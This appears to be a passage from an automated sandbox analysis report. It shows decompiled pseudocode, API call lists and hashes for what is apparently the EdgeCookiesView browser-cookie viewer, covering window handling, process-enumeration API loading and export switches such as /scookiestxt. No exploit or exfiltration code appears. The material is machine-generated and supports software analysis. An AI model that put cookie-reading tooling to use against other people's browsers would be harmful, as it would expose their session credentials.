                                                                                                                                                      				void* _t60;
                                                                                                                                                      				intOrPtr _t64;
                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				signed int _t105;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				intOrPtr _t115;
                                                                                                                                                      				signed char _t120;
                                                                                                                                                      				signed int _t124;
                                                                                                                                                      				intOrPtr _t129;
                                                                                                                                                      				intOrPtr _t131;
                                                                                                                                                      				intOrPtr* _t134;
                                                                                                                                                      				signed int _t136;
                                                                                                                                                      				void* _t139;
                                                                                                                                                      
                                                                                                                                                      				_t129 = __ecx;
                                                                                                                                                      				_t118 = _a4;
                                                                                                                                                      				_t139 = _t118 - 0x402;
                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                      				if(_t139 > 0) {
                                                                                                                                                      					_t60 = _t118 - 0x415;
                                                                                                                                                      					__eflags = _t60;
                                                                                                                                                      					if(_t60 == 0) {
                                                                                                                                                      						E0040A459(__ecx);
                                                                                                                                                      						_t132 = _t129;
                                                                                                                                                      						L31:
                                                                                                                                                      						__eflags = 0;
                                                                                                                                                      						E0040A1DC(0, _t118, _t132, 0);
                                                                                                                                                      						L32:
                                                                                                                                                      						_t64 =  *((intOrPtr*)(_t129 + 0x6a0));
                                                                                                                                                      						if(_t64 != 0 && _a4 == _t64) {
                                                                                                                                                      							_t127 = _a12;
                                                                                                                                                      							_t120 =  *(_a12 + 0xc);
                                                                                                                                                      							_t148 = _t120 & 0x00000008;
                                                                                                                                                      							_t66 =  *((intOrPtr*)(_t129 + 0x69c));
                                                                                                                                                      							if((_t120 & 0x00000008) == 0) {
                                                                                                                                                      								__eflags = _t120 & 0x00000040;
                                                                                                                                                      								if((_t120 & 0x00000040) != 0) {
                                                                                                                                                      									 *0x412c2c =  *0x412c2c & 0x00000000;
                                                                                                                                                      									__eflags =  *0x412c2c;
                                                                                                                                                      									E004077CB(_t66);
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								E0040990D(_t66, _t148, _t127);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						return E00401B1E(_t129, _a4, _a8, _a12);
                                                                                                                                                      					}
                                                                                                                                                      					_t69 = _t60 - 1;
                                                                                                                                                      					__eflags = _t69;
                                                                                                                                                      					if(_t69 == 0) {
                                                                                                                                                      						_t134 = __ecx + 0x69c;
                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();
                                                                                                                                                      						_t118 =  *_t134;
                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
                                                                                                                                                      						L22:
                                                                                                                                                      						_t132 = _t129;
                                                                                                                                                      						E0040A3BF(_t129);
                                                                                                                                                      						goto L31;
                                                                                                                                                      					}
                                                                                                                                                      					_t75 = _t69 - 0x12;
                                                                                                                                                      					__eflags = _t75;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags = _t75 - 0x41;
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);
                                                                                                                                                      							E0040B00A(_t129);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					goto L32;
	}
	if(_t139 == 0) {
		_t38 = __ecx + 0x280;
		 *_t38 =  *(__ecx + 0x280) & 0x00000000;
		__eflags =  *_t38;
		goto L22;
	}
	if(_t118 == 6) {
		__eflags = _a8 - 1;
		if(__eflags == 0) {
			PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
		}
		goto L32;
	}
	if(_t118 == 0xc) {
		__eflags = E0040546C(_a12, L"EdgeCookiesView");
		if(__eflags == 0) {
			goto L32;
		}
		return 0;
	}
	if(_t118 == 0x20) {
		__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
		if(__eflags != 0) {
			goto L32;
		}
		SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
		return 1;
	}
	if(_t118 == 0x2b) {
		_t115 = _a12;
		__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
		if(__eflags != 0) {
			goto L32;
		}
		__eflags =  *(__ecx + 0x694);
		if(__eflags != 0) {
			L14:
			SetBkMode( *(_t115 + 0x18), 1);
			SetTextColor( *(_t115 + 0x18), 0xff0000);
			_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
			asm("stosd");
			asm("stosd");
			asm("stosd");
			asm("stosd");
			_t131 = _a12;
			_v28 = 0x14;
			_v20 = 5;
			DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
			SelectObject( *(_t131 + 0x18), _t97);
			_t129 = _v8;
			goto L32;
		}
		_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
		asm("cdq");
		_t124 = 0x60;
		_t136 = _t105 * 0xe / _t124;
		_t108 =  *(__ecx + 0x694);
		__eflags = _t108;
		if(__eflags != 0) {
			DeleteObject(_t108);
			_t16 = __ecx + 0x694;
			 *_t16 =  *(__ecx + 0x694) & 0x00000000;
			__eflags =  *_t16;
		}
		 *(_t129 + 0x694) = E004058D4(_t136);
		goto L14;
	} else {
		if(_t118 == 0x7b) {
			_t126 = _a8;
			if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
				E0040B607(__ecx, _t126);
			}
		}
		goto L32;
	}
}

                                                                                                                                                      APIs
                                                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B8BD
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040B8DC
                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040B8FF
                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
                                                                                                                                                      • SelectObject.GDI32(00000014,00000000), ref: 0040B93F
                                                                                                                                                        • Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
                                                                                                                                                        • Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
                                                                                                                                                        • Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 0040B963
                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040B96A
                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
                                                                                                                                                      • memcpy.MSVCRT ref: 0040B9F9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
                                                                                                                                                      • String ID: EdgeCookiesView
                                                                                                                                                      • API String ID: 1858646182-2656830938
                                                                                                                                                      • Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                      • Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
                                                                                                                                                      • Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                      • Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040CA5A() {
                                                                                                                                                      				void* _t1;
                                                                                                                                                      				int _t2;
                                                                                                                                                      				struct HINSTANCE__* _t4;
                                                                                                                                                      
                                                                                                                                                      				if( *0x413260 != 0) {
                                                                                                                                                      					return _t1;
                                                                                                                                                      				}
                                                                                                                                                      				_t2 = LoadLibraryW(L"psapi.dll");
                                                                                                                                                      				_t4 = _t2;
                                                                                                                                                      				if(_t4 == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					return _t2;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
                                                                                                                                                      					 *0x4128e8 = _t2;
                                                                                                                                                      					if(_t2 != 0) {
                                                                                                                                                      						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                                                                                                                      						 *0x4128e0 = _t2;
                                                                                                                                                      						if(_t2 != 0) {
                                                                                                                                                      							_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
                                                                                                                                                      							 *0x4128d8 = _t2;
                                                                                                                                                      							if(_t2 != 0) {
                                                                                                                                                      								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                                                                                                                      								 *0x412b0c = _t2;
                                                                                                                                                      								if(_t2 != 0) {
                                                                                                                                                      									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                                                                                                                      									 *0x4128e4 = _t2;
                                                                                                                                                      									if(_t2 != 0) {
                                                                                                                                                      										 *0x413260 = 1;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					if( *0x413260 == 0) {
                                                                                                                                                      						_t2 = FreeLibrary(_t4);
                                                                                                                                                      					}
                                                                                                                                                      					goto L10;
                                                                                                                                                      				}
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040CAEA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                      • API String ID: 2449869053-70141382
                                                                                                                                                      • Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                      • Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
                                                                                                                                                      • Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                      • Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E0040BCAA(signed int __eax, void* __esi) {
                                                                                                                                                      				void* _t5;
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				void* _t7;
                                                                                                                                                      				void* _t8;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      
                                                                                                                                                      				_push(L"/shtml");
                                                                                                                                                      				L0040E03E();
                                                                                                                                                      				if(__eax != 0) {
                                                                                                                                                      					_push(L"/sverhtml");
                                                                                                                                                      					L0040E03E();
                                                                                                                                                      					if(__eax != 0) {
                                                                                                                                                      						_push(L"/sxml");
                                                                                                                                                      						L0040E03E();
                                                                                                                                                      						if(__eax != 0) {
                                                                                                                                                      							_push(L"/stab");
                                                                                                                                                      							L0040E03E();
                                                                                                                                                      							if(__eax != 0) {
                                                                                                                                                      								_push(L"/sjson");
                                                                                                                                                      								L0040E03E();
                                                                                                                                                      								if(__eax != 0) {
                                                                                                                                                      									_push(L"/scomma");
                                                                                                                                                      									L0040E03E();
                                                                                                                                                      									if(__eax != 0) {
                                                                                                                                                      										_push(L"/scookiestxt");
                                                                                                                                                      										L0040E03E();
                                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                                      										return ( ~__eax & 0xfffffff8) + 8;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t5 = 4;
                                                                                                                                                      										return _t5;
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									_t6 = 3;
                                                                                                                                                      									return _t6;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t7 = 2;
                                                                                                                                                      								return _t7;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_t8 = 7;
                                                                                                                                                      							return _t8;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t9 = 6;
                                                                                                                                                      						return _t9;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t10 = 5;
                                                                                                                                                      					return _t10;
                                                                                                                                                      				}
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                      • String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
                                                                                                                                                      • API String ID: 2081463915-1797186745
                                                                                                                                                      • Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                      • Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
                                                                                                                                                      • Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                      • Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C9D6() {
                                                                                                                                                      				void* _t1;
                                                                                                                                                      				_Unknown_base(*)()* _t2;
                                                                                                                                                      				struct HINSTANCE__* _t4;
                                                                                                                                                      
                                                                                                                                                      				if( *0x41325c != 0) {
                                                                                                                                                      					return _t1;
                                                                                                                                                      				}
                                                                                                                                                      				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                      				_t4 = _t2;
                                                                                                                                                      				if(_t4 == 0) {
                                                                                                                                                      					L9:
                                                                                                                                                      					return _t2;
                                                                                                                                                      				}
                                                                                                                                                      				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                                                      				 *0x4128dc = _t2;
                                                                                                                                                      				if(_t2 != 0) {
                                                                                                                                                      					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                                                      					 *0x4128d4 = _t2;
                                                                                                                                                      					if(_t2 != 0) {
                                                                                                                                                      						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                                                      						 *0x4128d0 = _t2;
                                                                                                                                                      						if(_t2 != 0) {
                                                                                                                                                      							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                                                      							 *0x412664 = _t2;
                                                                                                                                                      							if(_t2 != 0) {
                                                                                                                                                      								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                                                      								 *0x4128c8 = _t2;
                                                                                                                                                      								if(_t2 != 0) {
                                                                                                                                                      									 *0x41325c = 1;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				goto L9;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                      • Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
                                                                                                                                                      • Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
                                                                                                                                                      • Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
                                                                                                                                                      • Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E004071D1(void* __eflags, wchar_t* _a4) {
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t3;
                                                                                                                                                      				int _t6;
                                                                                                                                                      
                                                                                                                                                      				_t3 = E004057D1(_a4);
                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                      					wcscpy(0x412c38, _a4);
                                                                                                                                                      					wcscpy(0x412e48, L"general");
                                                                                                                                                      					_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                      					 *0x412ecc =  ~(_t6 - 1) + 1;
                                                                                                                                                      					E00406D4D(0x412ed0, L"charset", 0x3f);
                                                                                                                                                      					E00406D4D(0x412f50, L"TranslatorName", 0x3f);
                                                                                                                                                      					return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
                                                                                                                                                      				}
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                      • wcscpy.MSVCRT ref: 004071EB
                                                                                                                                                      • wcscpy.MSVCRT ref: 004071FB
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 0040720C
                                                                                                                                                        • Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                      • String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                      • API String ID: 3176057301-819253090
                                                                                                                                                      • Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
                                                                                                                                                      • Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
                                                                                                                                                      • Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
                                                                                                                                                      • Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A5AB(void* __esi) {
                                                                                                                                                      				struct HDWP__* _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				int _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                      				struct tagPOINT _v56;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				int _t99;
                                                                                                                                                      				void* _t101;
                                                                                                                                                      
                                                                                                                                                      				_t101 = __esi;
                                                                                                                                                      				if( *((intOrPtr*)(__esi + 0x244)) != 0) {
                                                                                                                                                      					GetClientRect( *(__esi + 0x208),  &_v40);
                                                                                                                                                      					GetWindowRect( *(__esi + 0x214),  &_v56);
                                                                                                                                                      					_v20 = _v44 - _v56.y + 1;
                                                                                                                                                      					GetWindowRect( *(__esi + 0x218),  &_v56);
                                                                                                                                                      					_v16 = _v40.right - _v40.left;
                                                                                                                                                      					_t99 = _v44 - _v56.y + 1;
                                                                                                                                                      					_v24 = _v40.bottom - _v40.top;
                                                                                                                                                      					_v12 = 0xdc;
                                                                                                                                                      					if( *(__esi + 0x6d4) != 0) {
                                                                                                                                                      						GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
                                                                                                                                                      						MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
                                                                                                                                                      						_v12 = _v44 + 6;
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
                                                                                                                                                      						_v12 = _v12 & 0x00000000;
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = BeginDeferWindowPos(4);
                                                                                                                                                      					DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
                                                                                                                                                      					DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
                                                                                                                                                      					DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
                                                                                                                                                      					DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
                                                                                                                                                      					return EndDeferWindowPos(_v8);
                                                                                                                                                      				}
                                                                                                                                                      				return _t53;
                                                                                                                                                      			}















                                                                                                                                                      APIs
                                                                                                                                                      • GetClientRect.USER32 ref: 0040A5CA
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040A5E0
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040A5F6
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040A630
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040A637
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040A647
                                                                                                                                                      • BeginDeferWindowPos.USER32 ref: 0040A66B
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040A6F5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                      • Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                      • Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
                                                                                                                                                      • Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                      • Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				struct HDWP__* _v8;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				struct HDWP__* _t27;
                                                                                                                                                      				intOrPtr* _t51;
                                                                                                                                                      				RECT* _t56;
                                                                                                                                                      
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t51 = __ecx;
                                                                                                                                                      				if(_a4 != 0x18) {
                                                                                                                                                      					L4:
                                                                                                                                                      					if(_a4 == 2) {
                                                                                                                                                      						KillTimer( *(_t51 + 0x10), 0x41);
                                                                                                                                                      					}
                                                                                                                                                      					if(_a4 != 0x113) {
                                                                                                                                                      						L11:
                                                                                                                                                      						if(_a4 == 5) {
                                                                                                                                                      							_t27 = BeginDeferWindowPos(5);
                                                                                                                                                      							_t56 = _t51 + 0x40;
                                                                                                                                                      							_v8 = _t27;
                                                                                                                                                      							E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
                                                                                                                                                      							E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
                                                                                                                                                      							E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
                                                                                                                                                      							E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
                                                                                                                                                      							E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
                                                                                                                                                      							EndDeferWindowPos(_v8);
                                                                                                                                                      							InvalidateRect( *(_t56 + 0x10), _t56, 1);
                                                                                                                                                      						}
                                                                                                                                                      						goto L13;
                                                                                                                                                      					} else {
                                                                                                                                                      						if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
                                                                                                                                                      							L13:
                                                                                                                                                      							return E004015CE(_t51, _a4, _a8, _a12);
                                                                                                                                                      						} else {
                                                                                                                                                      							 *((intOrPtr*)(_t51 + 0x78)) = 0;
                                                                                                                                                      							 *((intOrPtr*)( *_t51 + 4))(0);
